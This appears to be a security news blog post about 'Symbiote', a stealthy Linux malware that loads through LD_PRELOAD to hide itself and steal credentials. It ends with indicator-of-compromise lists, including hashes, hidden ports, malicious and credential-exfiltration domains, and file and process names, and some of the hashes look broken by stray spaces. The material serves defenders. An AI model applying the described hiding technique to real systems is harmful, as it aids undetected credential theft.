June 6, 2023

A recently discovered form of malware that infects Linux systems uses sophisticated techniques to hide and steal credentials.

The previously undetectable “Symbiote” malware acts in a parasitic nature in that it needs to infect other running processes to inflict damage on infected machines.

The symbiote is not a standalone executable file that is run to infect a machine but a shared object library that is loaded into all running processes to infect the machine.

Advertisements

Once Symbiote has infected all running processes, it delivers the attacker rootkit function with the ability to harvest credentials and remote access capability.

Symbiote, first detected in November 2021, was initially written to target the financial sector in Latin America. Upon successful infection, Symbiote hides any other malware deployed, making infections hard to detect. Hard might be an understatement: According to the researchers, performing live forensics on an infected may not turn up anything since all the files, processes, and network artifacts are hidden by the malware.

Malware targeting Linux systems is not new, but the stealth techniques used by Symbiote make it stand out. The malware is loaded by the linker via the LD_PRELOAD directive, allowing it to be loaded before any other shared objects. Since it’s loaded first, it can “hijack the imports” from the other library files loaded for the application. Symbiote uses this to hide its presence on the machine.

Detecting an infection at the rootkit level is difficult. Network telemetry can be used to detect anomalous DNS requests and security tools such as antivirus and endpoint detection and response should be statically linked to ensure they are not infected’ by userland rootkits.

Advertisements

Indicators of Compromise

  • 121157e0fcb728eb8a23b55457e89d45d76a a3b7d01d3d49105890a00662c924
  • f55af21f69a183fb8550ac60f392b05df14aa01 d7ffe9f28bc48a118dc110b4c
  • ec67bbdf55d3679fca72d3c814186ff4646dd7 79a862999c82c6faa8e6615180
  • a0cd554c35dee3fed3d1607dc18debd1296fa aee29b5bd77ff83ab6956a6f9d6
  • 45eacba032367db7f3b031e5d9df10b30d016 64f24da6847322f6af1fd8e7f01

Ports Hidden

  • 45345
  • 34535
  • 64543
  • 24645
  • 47623
  • 62537
  • 43253
  • 43753
  • 63424
  • 26424

Domains Hidden

  • assets[.]fans
  • caixa[.]cx
  • dpf[.]fm
  • bancodobrasil[.]dev
  • cctdcapllx0520
  • cctdcapllx0520[.]df[.]caixa
  • webfirewall[.]caixa[.]wf
  • caixa[.]wf

Process Names Hidden

  • javaserverx64
  • javaclientex64
  • javanodex86
  • apache2start
  • apache2stop
  • [watchdog/0]
  • certbotx64
  • certbotx86
  • javautils

File Names Hidden

  • apache2start
  • apache2stop
  • profiles.php
  • 404erro.php
  • javaserverx64
  • javaclientex64
  • javanodex86
  • liblinux.so
  • java.h
  • open.h
  • mpt86.h
  • sqlsearch.php
  • indexq.php
  • mt64.so
  • certbot.h
  • cert.h
  • certbotx64
  • certbotx86
  • javautils
  • search.so

Credential Exfil Domains

  • *.x3206.caixa.cx
  • *.dev21.bancodobrasil.dev

Leave a Reply

%d bloggers like this: